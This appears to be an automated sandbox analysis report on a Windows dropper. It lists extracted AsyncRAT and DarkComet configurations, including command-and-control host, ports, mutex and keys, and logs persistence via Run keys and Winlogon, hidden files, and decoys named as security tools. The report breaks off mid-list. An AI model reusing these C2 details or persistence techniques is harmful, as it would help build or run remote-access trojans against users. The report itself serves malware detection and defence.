Analysis
-
max time kernel
23s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20250410-en -
resource tags
arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system -
submitted
21/04/2025, 19:21
General
-
Target
9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe
-
Size
1018KB
-
MD5
eceb6e1e8aa84e6501589dc1d3deb419
-
SHA1
467a412530d7af26b01ec278d7d325e4b6dd047a
-
SHA256
9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236
-
SHA512
be256564941a092d73b6931dfa0a238b17d68c69e1742b98844e43fa3010db83bf9d52922912e127cd9b6cd1bbf9ecd39c4a36c2da676ca060bf21ffef8b27bf
-
SSDEEP
24576:pji1+TKiRzC0NqgGApfkxIpePcvkTR8cvkTAU:pu1+miRnQjALpe0vkTNvkTN
Malware Config
Extracted
asyncrat
0.5.8
Default
jvjv2044duck33.duckdns.org:8808
0fC8zJGwBBNm
-
delay
3
-
install
true
-
install_file
csrss.exe
-
install_folder
%AppData%
Extracted
darkcomet
Guest16
jvjv2044duck33.duckdns.org:1604
DC_MUTEX-CK7UE3N
-
InstallPath
MSDCSC\msdcsc.exe
-
gencode
Jp74nsvbhc4i
-
install
true
-
offline_keylogger
true
-
persistence
true
-
reg_key
MicroUpdate
Signatures
-
Asyncrat family
-
Darkcomet family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" VLC1.EXE -
Nanocore family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x001900000002b112-85.dat family_asyncrat -
Disables Task Manager via registry modification
-
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1720 attrib.exe 5528 attrib.exe 5668 attrib.exe 3584 attrib.exe 4048 attrib.exe -
Executes dropped EXE 64 IoCs
pid Process 2288 FILE5.EXE 5908 JOKE.EXE 1056 JOKE2.EXE 4364 LEGIT_SOFTWARE1.EXE 5108 ULTIME MULTIHACK REBORN.EXE 1900 VLC1.EXE 4700 LEGIT_SOFTWARE2.EXE 5828 WINDOWS SECURITY NANO.EXE 4728 WINDOWS DEFENDER.EXE 4980 SENDE2R.EXE 2676 Rundll32.exe 5688 Rundll32.exe 3504 msdcsc.exe 4416 Rundll32.exe 3004 msdcsc.exe 2276 Rundll32.exe 2988 msdcsc.exe 1708 Rundll32.exe 2148 Rundll32.exe 5268 Rundll32.exe 4752 Rundll32.exe 1720 Rundll32.exe 2116 Rundll32.exe 1520 Rundll32.exe 2788 Rundll32.exe 848 Rundll32.exe 5608 Rundll32.exe 2468 Rundll32.exe 2632 Rundll32.exe 2336 Rundll32.exe 4100 Rundll32.exe 5256 Rundll32.exe 5584 Rundll32.exe 4244 Rundll32.exe 560 Rundll32.exe 4676 Rundll32.exe 3028 Rundll32.exe 1628 Rundll32.exe 2352 Rundll32.exe 1764 Rundll32.exe 5216 Rundll32.exe 4516 Rundll32.exe 5656 Rundll32.exe 1100 Rundll32.exe 1292 Rundll32.exe 4508 Rundll32.exe 3348 Rundll32.exe 2600 csrss.exe 2744 Rundll32.exe 4944 Rundll32.exe 2628 Rundll32.exe 5692 Rundll32.exe 5052 Rundll32.exe 3480 Rundll32.exe 2988 msdcsc.exe 4144 Rundll32.exe 1104 Rundll32.exe 2676 Rundll32.exe 848 Rundll32.exe 5904 Rundll32.exe 4968 Rundll32.exe 2120 Rundll32.exe 5776 Rundll32.exe 2404 Rundll32.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000\Software\Microsoft\Windows\CurrentVersion\Run\FindMe = "C:\\Windows\\Temp\\svchost_533423.exe" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000\Software\Microsoft\Windows\CurrentVersion\Run\FindMe = "C:\\Users\\Public\\Documents\\winservice_533423.exe" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" VLC1.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\UPNP Host = "C:\\Program Files (x86)\\UPNP Host\\upnphost.exe" WINDOWS SECURITY NANO.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" msdcsc.exe -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WINDOWS SECURITY NANO.EXE -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe -
resource yara_rule behavioral2/memory/1900-95-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/files/0x001900000002b110-90.dat upx behavioral2/memory/3504-216-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3004-274-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3004-280-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2988-289-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/1900-286-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2988-296-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3504-317-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2988-446-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2988-448-0x0000000000400000-0x00000000004B7000-memory.dmp upx -
Drops file in Program Files directory 7 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\VLC1.EXE attrib.exe File created C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE FILE5.EXE File created C:\Program Files (x86)\VLC1.EXE FILE5.EXE File created C:\Program Files (x86)\WINDOWS DEFENDER.EXE FILE5.EXE File created C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE FILE5.EXE File created C:\Program Files (x86)\UPNP Host\upnphost.exe WINDOWS SECURITY NANO.EXE File opened for modification C:\Program Files (x86)\UPNP Host\upnphost.exe WINDOWS SECURITY NANO.EXE -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
pid Process 5236 powershell.exe 2952 powershell.exe 4816 powershell.exe 3576 powershell.exe 2536 powershell.exe 1104 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LEGIT_SOFTWARE2.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FILE5.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JOKE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LEGIT_SOFTWARE1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe -
Delays execution with timeout.exe 10 IoCs
pid Process 1532 timeout.exe 1800 timeout.exe 4504 timeout.exe 5756 timeout.exe 4432 timeout.exe 5512 timeout.exe 2700 timeout.exe 5212 timeout.exe 412 timeout.exe 2896 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000\Software\Microsoft\Internet Explorer\Main reg.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000_Classes\Local Settings 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ VLC1.EXE Key created \REGISTRY\USER\S-1-5-21-4239789418-2672923313-1754393631-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4612 reg.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1628 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5828 WINDOWS SECURITY NANO.EXE 5828 WINDOWS SECURITY NANO.EXE 5828 WINDOWS SECURITY NANO.EXE 5828 WINDOWS SECURITY NANO.EXE 3576 powershell.exe 3576 powershell.exe 4816 powershell.exe 4816 powershell.exe 2536 powershell.exe 2536 powershell.exe 2952 powershell.exe 2952 powershell.exe 1104 powershell.exe 1104 powershell.exe 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5828 WINDOWS SECURITY NANO.EXE 5828 WINDOWS SECURITY NANO.EXE 5828 WINDOWS SECURITY NANO.EXE 5828 WINDOWS SECURITY NANO.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5236 powershell.exe 5236 powershell.exe 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 3576 powershell.exe 3576 powershell.exe 1104 powershell.exe 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 2952 powershell.exe 4816 powershell.exe 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5236 powershell.exe 2536 powershell.exe 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 5108 ULTIME MULTIHACK REBORN.EXE 4728 WINDOWS DEFENDER.EXE 4728 WINDOWS DEFENDER.EXE 4728 WINDOWS DEFENDER.EXE 4728 WINDOWS DEFENDER.EXE 4728 WINDOWS DEFENDER.EXE 4728 WINDOWS DEFENDER.EXE 4728 WINDOWS DEFENDER.EXE 4728 WINDOWS DEFENDER.EXE 4728 WINDOWS DEFENDER.EXE 4728 WINDOWS DEFENDER.EXE 4728 WINDOWS DEFENDER.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5828 WINDOWS SECURITY NANO.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1900 VLC1.EXE Token: SeSecurityPrivilege 1900 VLC1.EXE Token: SeTakeOwnershipPrivilege 1900 VLC1.EXE Token: SeLoadDriverPrivilege 1900 VLC1.EXE Token: SeSystemProfilePrivilege 1900 VLC1.EXE Token: SeSystemtimePrivilege 1900 VLC1.EXE Token: SeProfSingleProcessPrivilege 1900 VLC1.EXE Token: SeIncBasePriorityPrivilege 1900 VLC1.EXE Token: SeCreatePagefilePrivilege 1900 VLC1.EXE Token: SeBackupPrivilege 1900 VLC1.EXE Token: SeRestorePrivilege 1900 VLC1.EXE Token: SeShutdownPrivilege 1900 VLC1.EXE Token: SeDebugPrivilege 1900 VLC1.EXE Token: SeSystemEnvironmentPrivilege 1900 VLC1.EXE Token: SeChangeNotifyPrivilege 1900 VLC1.EXE Token: SeRemoteShutdownPrivilege 1900 VLC1.EXE Token: SeUndockPrivilege 1900 VLC1.EXE Token: SeManageVolumePrivilege 1900 VLC1.EXE Token: SeImpersonatePrivilege 1900 VLC1.EXE Token: SeCreateGlobalPrivilege 1900 VLC1.EXE Token: 33 1900 VLC1.EXE Token: 34 1900 VLC1.EXE Token: 35 1900 VLC1.EXE Token: 36 1900 VLC1.EXE Token: SeDebugPrivilege 5828 WINDOWS SECURITY NANO.EXE Token: SeDebugPrivilege 4816 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 3576 powershell.exe Token: SeDebugPrivilege 2536 powershell.exe Token: SeIncreaseQuotaPrivilege 3504 msdcsc.exe Token: SeSecurityPrivilege 3504 msdcsc.exe Token: SeTakeOwnershipPrivilege 3504 msdcsc.exe Token: SeLoadDriverPrivilege 3504 msdcsc.exe Token: SeSystemProfilePrivilege 3504 msdcsc.exe Token: SeSystemtimePrivilege 3504 msdcsc.exe Token: SeProfSingleProcessPrivilege 3504 msdcsc.exe Token: SeIncBasePriorityPrivilege 3504 msdcsc.exe Token: SeCreatePagefilePrivilege 3504 msdcsc.exe Token: SeBackupPrivilege 3504 msdcsc.exe Token: SeRestorePrivilege 3504 msdcsc.exe Token: SeShutdownPrivilege 3504 msdcsc.exe Token: SeDebugPrivilege 3504 msdcsc.exe Token: SeSystemEnvironmentPrivilege 3504 msdcsc.exe Token: SeChangeNotifyPrivilege 3504 msdcsc.exe Token: SeRemoteShutdownPrivilege 3504 msdcsc.exe Token: SeUndockPrivilege 3504 msdcsc.exe Token: SeManageVolumePrivilege 3504 msdcsc.exe Token: SeImpersonatePrivilege 3504 msdcsc.exe Token: SeCreateGlobalPrivilege 3504 msdcsc.exe Token: 33 3504 msdcsc.exe Token: 34 3504 msdcsc.exe Token: 35 3504 msdcsc.exe Token: 36 3504 msdcsc.exe Token: SeDebugPrivilege 1104 powershell.exe Token: SeDebugPrivilege 5108 ULTIME MULTIHACK REBORN.EXE Token: SeDebugPrivilege 5236 powershell.exe Token: SeIncreaseQuotaPrivilege 3004 msdcsc.exe Token: SeSecurityPrivilege 3004 msdcsc.exe Token: SeTakeOwnershipPrivilege 3004 msdcsc.exe Token: SeLoadDriverPrivilege 3004 msdcsc.exe Token: SeSystemProfilePrivilege 3004 msdcsc.exe Token: SeSystemtimePrivilege 3004 msdcsc.exe Token: SeProfSingleProcessPrivilege 3004 msdcsc.exe Token: SeIncBasePriorityPrivilege 3004 msdcsc.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5908 JOKE.EXE 1056 JOKE2.EXE 3504 msdcsc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3376 wrote to memory of 1872 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 78 PID 3376 wrote to memory of 1872 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 78 PID 3376 wrote to memory of 1872 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 78 PID 3376 wrote to memory of 2288 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 79 PID 3376 wrote to memory of 2288 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 79 PID 3376 wrote to memory of 2288 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 79 PID 3376 wrote to memory of 4268 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 80 PID 3376 wrote to memory of 4268 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 80 PID 3376 wrote to memory of 4268 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 80 PID 3376 wrote to memory of 5924 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 81 PID 3376 wrote to memory of 5924 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 81 PID 3376 wrote to memory of 5924 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 81 PID 3376 wrote to memory of 5908 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 82 PID 3376 wrote to memory of 5908 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 82 PID 3376 wrote to memory of 5908 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 82 PID 3376 wrote to memory of 1056 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 83 PID 3376 wrote to memory of 1056 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 83 PID 3376 wrote to memory of 1056 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 83 PID 2288 wrote to memory of 5108 2288 FILE5.EXE 84 PID 2288 wrote to memory of 5108 2288 FILE5.EXE 84 PID 2288 wrote to memory of 5108 2288 FILE5.EXE 84 PID 3376 wrote to memory of 4364 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 85 PID 3376 wrote to memory of 4364 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 85 PID 3376 wrote to memory of 4364 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 85 PID 2288 wrote to memory of 1900 2288 FILE5.EXE 86 PID 2288 wrote to memory of 1900 2288 FILE5.EXE 86 PID 2288 wrote to memory of 1900 2288 FILE5.EXE 86 PID 3376 wrote to memory of 4700 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 87 PID 3376 wrote to memory of 4700 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 87 PID 3376 wrote to memory of 4700 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 87 PID 1872 wrote to memory of 6132 1872 WScript.exe 88 PID 1872 wrote to memory of 6132 1872 WScript.exe 88 PID 1872 wrote to memory of 6132 1872 WScript.exe 88 PID 2288 wrote to memory of 4728 2288 FILE5.EXE 89 PID 2288 wrote to memory of 4728 2288 FILE5.EXE 89 PID 2288 wrote to memory of 4728 2288 FILE5.EXE 89 PID 2288 wrote to memory of 5828 2288 FILE5.EXE 90 PID 2288 wrote to memory of 5828 2288 FILE5.EXE 90 PID 2288 wrote to memory of 5828 2288 FILE5.EXE 90 PID 3376 wrote to memory of 5832 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 91 PID 3376 wrote to memory of 5832 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 91 PID 3376 wrote to memory of 5832 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 91 PID 3376 wrote to memory of 4980 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 182 PID 3376 wrote to memory of 4980 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 182 PID 3376 wrote to memory of 4980 3376 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 182 PID 4268 wrote to memory of 5916 4268 WScript.exe 94 PID 4268 wrote to memory of 5916 4268 WScript.exe 94 PID 4268 wrote to memory of 5916 4268 WScript.exe 94 PID 3376 wrote to memory of 5604 3376 